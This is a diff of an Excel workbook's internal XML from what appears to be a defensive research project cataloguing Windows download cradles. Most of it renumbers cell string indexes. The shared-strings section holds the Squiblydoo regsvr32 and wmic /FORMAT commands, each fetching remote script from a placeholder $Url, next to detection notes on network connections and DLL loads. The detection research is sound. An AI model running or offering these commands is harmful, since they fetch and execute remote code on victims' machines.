+      </c>
+    </row>
+    <row r="2" spans="1:4" ht="128">
+      <c r="A2" s="40" t="s">
+        <v>5</v>
+      </c>
+      <c r="B2" s="47" t="s">
+        <v>43</v>
+      </c>
+      <c r="C2" s="47" t="s">
+        <v>43</v>
+      </c>
+      <c r="D2" s="47" t="s">
+        <v>43</v>
+      </c>
+    </row>
+    <row r="3" spans="1:4" ht="20" customHeight="1">
+      <c r="A3" s="41" t="s">
+        <v>2</v>
+      </c>
+      <c r="B3" s="47" t="s">
+        <v>40</v>
+      </c>
+      <c r="C3" s="47" t="s">
+        <v>40</v>
+      </c>
+      <c r="D3" s="47" t="s">
+        <v>40</v>
+      </c>
+    </row>
+    <row r="4" spans="1:4">
+      <c r="A4" s="41" t="s">
+        <v>16</v>
+      </c>
+      <c r="B4" s="47" t="s">
+        <v>40</v>
+      </c>
+      <c r="C4" s="47" t="s">
+        <v>40</v>
+      </c>
+      <c r="D4" s="47" t="s">
+        <v>40</v>
+      </c>
+    </row>
+    <row r="5" spans="1:4" s="9" customFormat="1">
+      <c r="A5" s="13" t="s">
+        <v>73</v>
+      </c>
+      <c r="B5" s="7" t="s">
+        <v>81</v>
+      </c>
+      <c r="C5" s="7" t="s">
+        <v>81</v>
+      </c>
+      <c r="D5" s="7" t="s">
+        <v>81</v>
+      </c>
+    </row>
+    <row r="6" spans="1:4" ht="64">
+      <c r="A6" s="40" t="s">
+        <v>7</v>
+      </c>
+      <c r="B6" s="47" t="s">
+        <v>41</v>
+      </c>
+      <c r="C6" s="47" t="s">
+        <v>41</v>
+      </c>
+      <c r="D6" s="47" t="s">
+        <v>41</v>
+      </c>
+    </row>
+    <row r="7" spans="1:4">
+      <c r="A7" s="40" t="s">
+        <v>8</v>
+      </c>
+      <c r="B7" s="47" t="s">
+        <v>42</v>
+      </c>
+      <c r="C7" s="47" t="s">
+        <v>42</v>
+      </c>
+      <c r="D7" s="47" t="s">
+        <v>42</v>
+      </c>
+    </row>
+    <row r="8" spans="1:4">
+      <c r="A8" s="13" t="s">
+        <v>66</v>
+      </c>
+      <c r="B8" s="48" t="s">
+        <v>0</v>
+      </c>
+      <c r="C8" s="48" t="s">
+        <v>0</v>
+      </c>
+      <c r="D8" s="48" t="s">
+        <v>0</v>
+      </c>
+    </row>
+    <row r="9" spans="1:4">
+      <c r="A9" s="13" t="s">
+        <v>67</v>
+      </c>
+      <c r="B9" s="47" t="s">
+        <v>36</v>
+      </c>
+      <c r="C9" s="47" t="s">
+        <v>36</v>
+      </c>
+      <c r="D9" s="47" t="s">
+        <v>36</v>
+      </c>
     </row>
   </sheetData>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
@@ -12382,7 +13164,7 @@
         <v>151</v>
       </c>
       <c r="D7" s="27" t="s">
-        <v>186</v>
+        <v>185</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="152">
@@ -12681,13 +13463,13 @@
         <v>8</v>
       </c>
       <c r="B7" s="17" t="s">
+        <v>196</v>
+      </c>
+      <c r="C7" s="17" t="s">
         <v>197</v>
       </c>
-      <c r="C7" s="17" t="s">
+      <c r="D7" s="27" t="s">
         <v>198</v>
-      </c>
-      <c r="D7" s="27" t="s">
-        <v>199</v>
       </c>
     </row>
     <row r="8" spans="1:6" ht="290">
@@ -12701,7 +13483,7 @@
         <v>155</v>
       </c>
       <c r="D8" s="17" t="s">
-        <v>188</v>
+        <v>187</v>
       </c>
     </row>
     <row r="9" spans="1:6" ht="409.6">
@@ -12832,13 +13614,13 @@
         <v>8</v>
       </c>
       <c r="B7" s="54" t="s">
+        <v>193</v>
+      </c>
+      <c r="C7" s="17" t="s">
         <v>194</v>
       </c>
-      <c r="C7" s="17" t="s">
+      <c r="D7" s="27" t="s">
         <v>195</v>
-      </c>
-      <c r="D7" s="27" t="s">
-        <v>196</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="332">
@@ -12852,7 +13634,7 @@
         <v>112</v>
       </c>
       <c r="D8" s="17" t="s">
-        <v>187</v>
+        <v>186</v>
       </c>
     </row>
     <row r="9" spans="1:4">
@@ -12983,13 +13765,13 @@
         <v>8</v>
       </c>
       <c r="B7" s="27" t="s">
+        <v>191</v>
+      </c>
+      <c r="C7" s="50" t="s">
         <v>192</v>
       </c>
-      <c r="C7" s="50" t="s">
-        <v>193</v>
-      </c>
       <c r="D7" s="27" t="s">
-        <v>208</v>
+        <v>207</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="246">
@@ -13003,7 +13785,7 @@
         <v>109</v>
       </c>
       <c r="D8" s="30" t="s">
-        <v>189</v>
+        <v>188</v>
       </c>
     </row>
     <row r="9" spans="1:4">
@@ -13064,13 +13846,13 @@
         <v>5</v>
       </c>
       <c r="B2" s="10" t="s">
-        <v>215</v>
+        <v>214</v>
       </c>
       <c r="C2" s="10" t="s">
-        <v>215</v>
+        <v>214</v>
       </c>
       <c r="D2" s="10" t="s">
-        <v>215</v>
+        <v>214</v>
       </c>
     </row>
     <row r="3" spans="1:4" ht="32">
@@ -13140,7 +13922,7 @@
         <v>159</v>
       </c>
       <c r="D7" s="55" t="s">
-        <v>190</v>
+        <v>189</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="32">
@@ -13162,13 +13944,13 @@
         <v>67</v>
       </c>
       <c r="B9" s="7" t="s">
-        <v>191</v>
+        <v>190</v>
       </c>
       <c r="C9" s="7" t="s">
-        <v>191</v>
+        <v>190</v>
       </c>
       <c r="D9" s="7" t="s">
-        <v>191</v>
+        <v>190</v>
       </c>
     </row>
   </sheetData>
@@ -13291,7 +14073,7 @@
         <v>164</v>
       </c>
       <c r="D7" s="35" t="s">
-        <v>200</v>
+        <v>199</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="32">

--- a/other/DownloadCradle/DownloadCradle.xlsx
+++ b/other/DownloadCradle/DownloadCradle.xlsx
@@ -428,10 +428,6 @@
   </si>
   <si>
     <t>No noteable key activity of interest</t>
-  </si>
-  <si>
-    <t>Squiglyboo - regsvr32.exe as a download cradle (not specifically powershell)
-regsvr32.exe /s /u /i:$Url scrobj.dll</t>
   </si>
   <si>
     <t xml:space="preserve">MSHTA.EXE
@@ -9256,54 +9252,6 @@
         <color theme="1"/>
         <rFont val="Calibri"/>
         <family val="2"/>
-      </rPr>
-      <t>Squiglydoo - regsvr32.exe</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve"> as a download cradle (not specifically powershell)
-regsvr32.exe /s /u /i:$Url scrobj.dll
-Proxy aware</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-      </rPr>
-      <t>SquiglyTwo - wmic.exe</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve"> as a download cradle (not specifically powershell)
-cmd /d wmic.exe os get /FORMAT:"$Url"
-Proxy aware</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
         <scheme val="minor"/>
       </rPr>
       <t>Regsvr32.exe loads:</t>
@@ -9899,6 +9847,58 @@
 wmic.exe connecting out to the internet is a good indicator.
 Wmic.exe also loads wininet.dll and winhttp.dll across all versions I tested.</t>
     </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+      </rPr>
+      <t>Squiblydoo - regsvr32.exe</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve"> as a download cradle (not specifically powershell)
+regsvr32.exe /s /u /i:$Url scrobj.dll
+Proxy aware</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+      </rPr>
+      <t>Squiblydoo - wmic.exe</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve"> as a download cradle (not specifically powershell)
+cmd /d wmic.exe os get /FORMAT:"$Url"
+Proxy aware</t>
+    </r>
+  </si>
+  <si>
+    <t>Squiblydoo - regsvr32.exe as a download cradle (not specifically powershell)
+regsvr32.exe /s /u /i:$Url scrobj.dll</t>
   </si>
 </sst>
 </file>
@@ -11078,22 +11078,22 @@
   <sheetData>
     <row r="1" spans="1:1" ht="152">
       <c r="A1" s="3" t="s">
-        <v>68</v>
+        <v>67</v>
       </c>
     </row>
     <row r="2" spans="1:1" ht="104">
       <c r="A2" s="4" t="s">
-        <v>208</v>
+        <v>207</v>
       </c>
     </row>
     <row r="3" spans="1:1" ht="200">
       <c r="A3" s="3" t="s">
-        <v>144</v>
+        <v>143</v>
       </c>
     </row>
     <row r="4" spans="1:1" ht="120">
       <c r="A4" s="3" t="s">
-        <v>145</v>
+        <v>144</v>
       </c>
     </row>
     <row r="5" spans="1:1" ht="24">
@@ -11147,13 +11147,13 @@
         <v>18</v>
       </c>
       <c r="B1" s="25" t="s">
-        <v>138</v>
+        <v>137</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>98</v>
+        <v>97</v>
       </c>
       <c r="D1" s="25" t="s">
-        <v>44</v>
+        <v>43</v>
       </c>
     </row>
     <row r="2" spans="1:10" ht="112">
@@ -11188,30 +11188,30 @@
     </row>
     <row r="4" spans="1:10" ht="52" customHeight="1">
       <c r="A4" s="14" t="s">
-        <v>101</v>
+        <v>100</v>
       </c>
       <c r="B4" s="10" t="s">
-        <v>141</v>
+        <v>140</v>
       </c>
       <c r="C4" s="10" t="s">
         <v>19</v>
       </c>
       <c r="D4" s="27" t="s">
-        <v>54</v>
+        <v>53</v>
       </c>
     </row>
     <row r="5" spans="1:10">
       <c r="A5" s="13" t="s">
+        <v>72</v>
+      </c>
+      <c r="B5" s="7" t="s">
         <v>73</v>
       </c>
-      <c r="B5" s="7" t="s">
-        <v>74</v>
-      </c>
       <c r="C5" s="7" t="s">
-        <v>74</v>
+        <v>73</v>
       </c>
       <c r="D5" s="7" t="s">
-        <v>74</v>
+        <v>73</v>
       </c>
     </row>
     <row r="6" spans="1:10">
@@ -11233,41 +11233,41 @@
         <v>8</v>
       </c>
       <c r="B7" s="44" t="s">
-        <v>167</v>
+        <v>166</v>
       </c>
       <c r="C7" s="7" t="s">
-        <v>206</v>
+        <v>205</v>
       </c>
       <c r="D7" s="27" t="s">
-        <v>200</v>
+        <v>199</v>
       </c>
     </row>
     <row r="8" spans="1:10" ht="32">
       <c r="A8" s="13" t="s">
-        <v>66</v>
+        <v>65</v>
       </c>
       <c r="B8" s="7" t="s">
-        <v>111</v>
+        <v>110</v>
       </c>
       <c r="C8" s="7" t="s">
-        <v>111</v>
+        <v>110</v>
       </c>
       <c r="D8" s="7" t="s">
-        <v>111</v>
+        <v>110</v>
       </c>
     </row>
     <row r="9" spans="1:10" ht="276">
       <c r="A9" s="13" t="s">
-        <v>67</v>
+        <v>66</v>
       </c>
       <c r="B9" s="44" t="s">
-        <v>166</v>
+        <v>165</v>
       </c>
       <c r="C9" s="27" t="s">
-        <v>114</v>
+        <v>113</v>
       </c>
       <c r="D9" s="44" t="s">
-        <v>102</v>
+        <v>101</v>
       </c>
     </row>
   </sheetData>
@@ -11299,13 +11299,13 @@
         <v>18</v>
       </c>
       <c r="B1" s="9" t="s">
-        <v>138</v>
+        <v>137</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>98</v>
+        <v>97</v>
       </c>
       <c r="D1" s="25" t="s">
-        <v>44</v>
+        <v>43</v>
       </c>
     </row>
     <row r="2" spans="1:4" ht="80">
@@ -11313,13 +11313,13 @@
         <v>5</v>
       </c>
       <c r="B2" s="22" t="s">
-        <v>55</v>
+        <v>54</v>
       </c>
       <c r="C2" s="22" t="s">
-        <v>55</v>
+        <v>54</v>
       </c>
       <c r="D2" s="22" t="s">
-        <v>55</v>
+        <v>54</v>
       </c>
     </row>
     <row r="3" spans="1:4" ht="48">
@@ -11338,28 +11338,28 @@
     </row>
     <row r="4" spans="1:4" ht="32">
       <c r="A4" s="14" t="s">
-        <v>101</v>
+        <v>100</v>
       </c>
       <c r="B4" s="10" t="s">
-        <v>141</v>
+        <v>140</v>
       </c>
       <c r="C4" s="42"/>
       <c r="D4" s="43" t="s">
-        <v>54</v>
+        <v>53</v>
       </c>
     </row>
     <row r="5" spans="1:4" s="9" customFormat="1">
       <c r="A5" s="13" t="s">
+        <v>72</v>
+      </c>
+      <c r="B5" s="7" t="s">
         <v>73</v>
       </c>
-      <c r="B5" s="7" t="s">
-        <v>74</v>
-      </c>
       <c r="C5" s="7" t="s">
-        <v>74</v>
+        <v>73</v>
       </c>
       <c r="D5" s="7" t="s">
-        <v>74</v>
+        <v>73</v>
       </c>
     </row>
     <row r="6" spans="1:4">
@@ -11381,41 +11381,41 @@
         <v>8</v>
       </c>
       <c r="B7" s="54" t="s">
+        <v>167</v>
+      </c>
+      <c r="C7" s="36" t="s">
         <v>168</v>
       </c>
-      <c r="C7" s="36" t="s">
-        <v>169</v>
-      </c>
       <c r="D7" s="36" t="s">
-        <v>201</v>
+        <v>200</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="32">
       <c r="A8" s="13" t="s">
-        <v>66</v>
+        <v>65</v>
       </c>
       <c r="B8" s="7" t="s">
-        <v>111</v>
+        <v>110</v>
       </c>
       <c r="C8" s="7" t="s">
-        <v>111</v>
+        <v>110</v>
       </c>
       <c r="D8" s="7" t="s">
-        <v>111</v>
+        <v>110</v>
       </c>
     </row>
     <row r="9" spans="1:4" ht="276">
       <c r="A9" s="13" t="s">
-        <v>67</v>
+        <v>66</v>
       </c>
       <c r="B9" s="44" t="s">
-        <v>166</v>
+        <v>165</v>
       </c>
       <c r="C9" s="27" t="s">
-        <v>115</v>
+        <v>114</v>
       </c>
       <c r="D9" s="44" t="s">
-        <v>56</v>
+        <v>55</v>
       </c>
     </row>
     <row r="25" spans="4:4">
@@ -11450,13 +11450,13 @@
         <v>18</v>
       </c>
       <c r="B1" s="9" t="s">
-        <v>138</v>
+        <v>137</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>98</v>
+        <v>97</v>
       </c>
       <c r="D1" s="25" t="s">
-        <v>44</v>
+        <v>43</v>
       </c>
     </row>
     <row r="2" spans="1:4" ht="112">
@@ -11464,13 +11464,13 @@
         <v>5</v>
       </c>
       <c r="B2" s="27" t="s">
-        <v>90</v>
+        <v>89</v>
       </c>
       <c r="C2" s="27" t="s">
-        <v>90</v>
+        <v>89</v>
       </c>
       <c r="D2" s="27" t="s">
-        <v>90</v>
+        <v>89</v>
       </c>
     </row>
     <row r="3" spans="1:4" ht="48">
@@ -11489,28 +11489,28 @@
     </row>
     <row r="4" spans="1:4" ht="32">
       <c r="A4" s="14" t="s">
-        <v>101</v>
+        <v>100</v>
       </c>
       <c r="B4" s="10" t="s">
-        <v>141</v>
+        <v>140</v>
       </c>
       <c r="C4" s="42"/>
       <c r="D4" s="43" t="s">
-        <v>54</v>
+        <v>53</v>
       </c>
     </row>
     <row r="5" spans="1:4" s="9" customFormat="1">
       <c r="A5" s="13" t="s">
+        <v>72</v>
+      </c>
+      <c r="B5" s="7" t="s">
         <v>73</v>
       </c>
-      <c r="B5" s="7" t="s">
-        <v>74</v>
-      </c>
       <c r="C5" s="7" t="s">
-        <v>74</v>
+        <v>73</v>
       </c>
       <c r="D5" s="7" t="s">
-        <v>74</v>
+        <v>73</v>
       </c>
     </row>
     <row r="6" spans="1:4" ht="208">
@@ -11518,13 +11518,13 @@
         <v>7</v>
       </c>
       <c r="B6" s="7" t="s">
-        <v>171</v>
+        <v>170</v>
       </c>
       <c r="C6" s="7" t="s">
-        <v>118</v>
+        <v>117</v>
       </c>
       <c r="D6" s="7" t="s">
-        <v>72</v>
+        <v>71</v>
       </c>
     </row>
     <row r="7" spans="1:4" ht="390" customHeight="1">
@@ -11532,41 +11532,41 @@
         <v>8</v>
       </c>
       <c r="B7" s="57" t="s">
-        <v>172</v>
+        <v>171</v>
       </c>
       <c r="C7" s="36" t="s">
-        <v>205</v>
+        <v>204</v>
       </c>
       <c r="D7" s="36" t="s">
-        <v>202</v>
+        <v>201</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="288">
       <c r="A8" s="13" t="s">
-        <v>66</v>
+        <v>65</v>
       </c>
       <c r="B8" s="7" t="s">
-        <v>173</v>
+        <v>172</v>
       </c>
       <c r="C8" s="7" t="s">
-        <v>119</v>
+        <v>118</v>
       </c>
       <c r="D8" s="7" t="s">
-        <v>69</v>
+        <v>68</v>
       </c>
     </row>
     <row r="9" spans="1:4" ht="276">
       <c r="A9" s="13" t="s">
-        <v>67</v>
+        <v>66</v>
       </c>
       <c r="B9" s="44" t="s">
-        <v>166</v>
+        <v>165</v>
       </c>
       <c r="C9" s="44" t="s">
-        <v>166</v>
+        <v>165</v>
       </c>
       <c r="D9" s="44" t="s">
-        <v>70</v>
+        <v>69</v>
       </c>
     </row>
     <row r="25" spans="4:4">
@@ -11600,13 +11600,13 @@
         <v>18</v>
       </c>
       <c r="B1" s="9" t="s">
-        <v>138</v>
+        <v>137</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>98</v>
+        <v>97</v>
       </c>
       <c r="D1" s="25" t="s">
-        <v>44</v>
+        <v>43</v>
       </c>
     </row>
     <row r="2" spans="1:4" ht="409.6">
@@ -11614,13 +11614,13 @@
         <v>5</v>
       </c>
       <c r="B2" s="27" t="s">
-        <v>71</v>
+        <v>70</v>
       </c>
       <c r="C2" s="27" t="s">
-        <v>71</v>
+        <v>70</v>
       </c>
       <c r="D2" s="27" t="s">
-        <v>71</v>
+        <v>70</v>
       </c>
     </row>
     <row r="3" spans="1:4" ht="48">
@@ -11639,28 +11639,28 @@
     </row>
     <row r="4" spans="1:4" ht="32">
       <c r="A4" s="14" t="s">
-        <v>101</v>
+        <v>100</v>
       </c>
       <c r="B4" s="10" t="s">
-        <v>141</v>
+        <v>140</v>
       </c>
       <c r="C4" s="42"/>
       <c r="D4" s="43" t="s">
-        <v>54</v>
+        <v>53</v>
       </c>
     </row>
     <row r="5" spans="1:4" s="9" customFormat="1">
       <c r="A5" s="13" t="s">
+        <v>72</v>
+      </c>
+      <c r="B5" s="7" t="s">
         <v>73</v>
       </c>
-      <c r="B5" s="7" t="s">
-        <v>74</v>
-      </c>
       <c r="C5" s="7" t="s">
-        <v>74</v>
+        <v>73</v>
       </c>
       <c r="D5" s="7" t="s">
-        <v>74</v>
+        <v>73</v>
       </c>
     </row>
     <row r="6" spans="1:4">
@@ -11682,41 +11682,41 @@
         <v>8</v>
       </c>
       <c r="B7" s="56" t="s">
-        <v>170</v>
+        <v>169</v>
       </c>
       <c r="C7" s="27" t="s">
-        <v>204</v>
+        <v>203</v>
       </c>
       <c r="D7" s="36" t="s">
-        <v>203</v>
+        <v>202</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="48">
       <c r="A8" s="13" t="s">
-        <v>66</v>
+        <v>65</v>
       </c>
       <c r="B8" s="7" t="s">
-        <v>111</v>
+        <v>110</v>
       </c>
       <c r="C8" s="7" t="s">
-        <v>111</v>
+        <v>110</v>
       </c>
       <c r="D8" s="7" t="s">
-        <v>82</v>
+        <v>81</v>
       </c>
     </row>
     <row r="9" spans="1:4" ht="276">
       <c r="A9" s="13" t="s">
-        <v>67</v>
+        <v>66</v>
       </c>
       <c r="B9" s="44" t="s">
-        <v>166</v>
+        <v>165</v>
       </c>
       <c r="C9" s="36" t="s">
+        <v>115</v>
+      </c>
+      <c r="D9" s="27" t="s">
         <v>116</v>
-      </c>
-      <c r="D9" s="27" t="s">
-        <v>117</v>
       </c>
     </row>
   </sheetData>
@@ -11746,13 +11746,13 @@
         <v>18</v>
       </c>
       <c r="B1" s="9" t="s">
-        <v>138</v>
+        <v>137</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>98</v>
+        <v>97</v>
       </c>
       <c r="D1" s="45" t="s">
-        <v>44</v>
+        <v>43</v>
       </c>
     </row>
     <row r="2" spans="1:4" ht="96">
@@ -11766,7 +11766,7 @@
         <v>27</v>
       </c>
       <c r="D2" s="27" t="s">
-        <v>48</v>
+        <v>47</v>
       </c>
     </row>
     <row r="3" spans="1:4" ht="32">
@@ -11780,35 +11780,35 @@
         <v>25</v>
       </c>
       <c r="D3" s="45" t="s">
-        <v>47</v>
+        <v>46</v>
       </c>
     </row>
     <row r="4" spans="1:4" ht="48">
       <c r="A4" s="14" t="s">
-        <v>101</v>
+        <v>100</v>
       </c>
       <c r="B4" s="10" t="s">
-        <v>175</v>
+        <v>174</v>
       </c>
       <c r="C4" s="10" t="s">
         <v>19</v>
       </c>
       <c r="D4" s="45" t="s">
-        <v>47</v>
+        <v>46</v>
       </c>
     </row>
     <row r="5" spans="1:4" s="9" customFormat="1">
       <c r="A5" s="13" t="s">
-        <v>73</v>
+        <v>72</v>
       </c>
       <c r="B5" s="7" t="s">
-        <v>78</v>
+        <v>77</v>
       </c>
       <c r="C5" s="7" t="s">
-        <v>78</v>
+        <v>77</v>
       </c>
       <c r="D5" s="45" t="s">
-        <v>47</v>
+        <v>46</v>
       </c>
     </row>
     <row r="6" spans="1:4" ht="48">
@@ -11822,7 +11822,7 @@
         <v>26</v>
       </c>
       <c r="D6" s="45" t="s">
-        <v>47</v>
+        <v>46</v>
       </c>
     </row>
     <row r="7" spans="1:4" ht="409.6">
@@ -11830,18 +11830,18 @@
         <v>8</v>
       </c>
       <c r="B7" s="54" t="s">
-        <v>176</v>
+        <v>175</v>
       </c>
       <c r="C7" s="47" t="s">
-        <v>209</v>
+        <v>208</v>
       </c>
       <c r="D7" s="45" t="s">
-        <v>47</v>
+        <v>46</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="32">
       <c r="A8" s="13" t="s">
-        <v>66</v>
+        <v>65</v>
       </c>
       <c r="B8" s="43" t="s">
         <v>24</v>
@@ -11850,21 +11850,21 @@
         <v>24</v>
       </c>
       <c r="D8" s="45" t="s">
-        <v>47</v>
+        <v>46</v>
       </c>
     </row>
     <row r="9" spans="1:4">
       <c r="A9" s="13" t="s">
-        <v>67</v>
+        <v>66</v>
       </c>
       <c r="B9" s="43" t="s">
-        <v>61</v>
+        <v>60</v>
       </c>
       <c r="C9" s="43" t="s">
-        <v>61</v>
+        <v>60</v>
       </c>
       <c r="D9" s="45" t="s">
-        <v>47</v>
+        <v>46</v>
       </c>
     </row>
   </sheetData>
@@ -11895,13 +11895,13 @@
         <v>18</v>
       </c>
       <c r="B1" s="9" t="s">
-        <v>138</v>
+        <v>137</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>98</v>
+        <v>97</v>
       </c>
       <c r="D1" s="25" t="s">
-        <v>44</v>
+        <v>43</v>
       </c>
     </row>
     <row r="2" spans="1:4" ht="80">
@@ -11929,12 +11929,12 @@
         <v>25</v>
       </c>
       <c r="D3" s="43" t="s">
-        <v>87</v>
+        <v>86</v>
       </c>
     </row>
     <row r="4" spans="1:4" ht="48">
       <c r="A4" s="14" t="s">
-        <v>101</v>
+        <v>100</v>
       </c>
       <c r="B4" s="10" t="s">
         <v>19</v>
@@ -11943,21 +11943,21 @@
         <v>19</v>
       </c>
       <c r="D4" s="43" t="s">
-        <v>54</v>
+        <v>53</v>
       </c>
     </row>
     <row r="5" spans="1:4" s="9" customFormat="1">
       <c r="A5" s="13" t="s">
-        <v>73</v>
+        <v>72</v>
       </c>
       <c r="B5" s="7" t="s">
-        <v>78</v>
+        <v>77</v>
       </c>
       <c r="C5" s="7" t="s">
-        <v>78</v>
+        <v>77</v>
       </c>
       <c r="D5" s="7" t="s">
-        <v>78</v>
+        <v>77</v>
       </c>
     </row>
     <row r="6" spans="1:4" ht="64">
@@ -11979,18 +11979,18 @@
         <v>8</v>
       </c>
       <c r="B7" s="54" t="s">
-        <v>178</v>
+        <v>177</v>
       </c>
       <c r="C7" s="47" t="s">
-        <v>177</v>
+        <v>176</v>
       </c>
       <c r="D7" s="36" t="s">
-        <v>210</v>
+        <v>209</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="32">
       <c r="A8" s="13" t="s">
-        <v>66</v>
+        <v>65</v>
       </c>
       <c r="B8" s="43" t="s">
         <v>24</v>
@@ -12004,16 +12004,16 @@
     </row>
     <row r="9" spans="1:4">
       <c r="A9" s="13" t="s">
-        <v>67</v>
+        <v>66</v>
       </c>
       <c r="B9" s="43" t="s">
-        <v>123</v>
+        <v>122</v>
       </c>
       <c r="C9" s="43" t="s">
-        <v>123</v>
+        <v>122</v>
       </c>
       <c r="D9" s="43" t="s">
-        <v>62</v>
+        <v>61</v>
       </c>
     </row>
   </sheetData>
@@ -12046,13 +12046,13 @@
         <v>18</v>
       </c>
       <c r="B1" s="25" t="s">
-        <v>138</v>
+        <v>137</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>98</v>
+        <v>97</v>
       </c>
       <c r="D1" s="25" t="s">
-        <v>44</v>
+        <v>43</v>
       </c>
     </row>
     <row r="2" spans="1:4" ht="96">
@@ -12080,35 +12080,35 @@
         <v>15</v>
       </c>
       <c r="D3" s="49" t="s">
-        <v>88</v>
+        <v>87</v>
       </c>
     </row>
     <row r="4" spans="1:4" ht="48">
       <c r="A4" s="14" t="s">
-        <v>101</v>
+        <v>100</v>
       </c>
       <c r="B4" s="10" t="s">
-        <v>157</v>
+        <v>156</v>
       </c>
       <c r="C4" s="10" t="s">
         <v>19</v>
       </c>
       <c r="D4" s="27" t="s">
-        <v>51</v>
+        <v>50</v>
       </c>
     </row>
     <row r="5" spans="1:4">
       <c r="A5" s="13" t="s">
-        <v>73</v>
+        <v>72</v>
       </c>
       <c r="B5" s="7" t="s">
-        <v>77</v>
+        <v>76</v>
       </c>
       <c r="C5" s="7" t="s">
-        <v>77</v>
+        <v>76</v>
       </c>
       <c r="D5" s="7" t="s">
-        <v>77</v>
+        <v>76</v>
       </c>
     </row>
     <row r="6" spans="1:4" ht="64">
@@ -12116,13 +12116,13 @@
         <v>7</v>
       </c>
       <c r="B6" s="17" t="s">
-        <v>133</v>
+        <v>132</v>
       </c>
       <c r="C6" s="17" t="s">
-        <v>133</v>
+        <v>132</v>
       </c>
       <c r="D6" s="17" t="s">
-        <v>133</v>
+        <v>132</v>
       </c>
     </row>
     <row r="7" spans="1:4" ht="409.6">
@@ -12130,41 +12130,41 @@
         <v>8</v>
       </c>
       <c r="B7" s="27" t="s">
-        <v>179</v>
+        <v>178</v>
       </c>
       <c r="C7" s="26" t="s">
-        <v>135</v>
+        <v>134</v>
       </c>
       <c r="D7" s="27" t="s">
-        <v>211</v>
+        <v>210</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="162">
       <c r="A8" s="13" t="s">
-        <v>66</v>
+        <v>65</v>
       </c>
       <c r="B8" s="27" t="s">
+        <v>179</v>
+      </c>
+      <c r="C8" s="53" t="s">
         <v>180</v>
       </c>
-      <c r="C8" s="53" t="s">
-        <v>181</v>
-      </c>
       <c r="D8" s="27" t="s">
-        <v>134</v>
+        <v>133</v>
       </c>
     </row>
     <row r="9" spans="1:4">
       <c r="A9" s="13" t="s">
-        <v>67</v>
+        <v>66</v>
       </c>
       <c r="B9" s="17" t="s">
-        <v>136</v>
+        <v>135</v>
       </c>
       <c r="C9" s="17" t="s">
-        <v>136</v>
+        <v>135</v>
       </c>
       <c r="D9" s="17" t="s">
-        <v>136</v>
+        <v>135</v>
       </c>
     </row>
   </sheetData>
@@ -12179,7 +12179,7 @@
   <sheetViews>
     <sheetView workbookViewId="0">
       <pane xSplit="1" topLeftCell="B1" activePane="topRight" state="frozen"/>
-      <selection pane="topRight" activeCell="B7" sqref="B7"/>
+      <selection pane="topRight" activeCell="A3" sqref="A3"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16"/>
@@ -12195,13 +12195,13 @@
         <v>18</v>
       </c>
       <c r="B1" s="9" t="s">
-        <v>138</v>
+        <v>137</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>98</v>
+        <v>97</v>
       </c>
       <c r="D1" s="25" t="s">
-        <v>44</v>
+        <v>43</v>
       </c>
     </row>
     <row r="2" spans="1:4" ht="32">
@@ -12209,13 +12209,13 @@
         <v>5</v>
       </c>
       <c r="B2" s="43" t="s">
-        <v>37</v>
+        <v>242</v>
       </c>
       <c r="C2" s="43" t="s">
-        <v>37</v>
+        <v>242</v>
       </c>
       <c r="D2" s="43" t="s">
-        <v>37</v>
+        <v>242</v>
       </c>
     </row>
     <row r="3" spans="1:4" ht="20" customHeight="1">
@@ -12223,41 +12223,41 @@
         <v>2</v>
       </c>
       <c r="B3" s="47" t="s">
-        <v>227</v>
+        <v>226</v>
       </c>
       <c r="C3" s="47" t="s">
-        <v>227</v>
+        <v>226</v>
       </c>
       <c r="D3" s="42" t="s">
-        <v>89</v>
+        <v>88</v>
       </c>
     </row>
     <row r="4" spans="1:4" ht="48">
       <c r="A4" s="14" t="s">
-        <v>101</v>
+        <v>100</v>
       </c>
       <c r="B4" s="10" t="s">
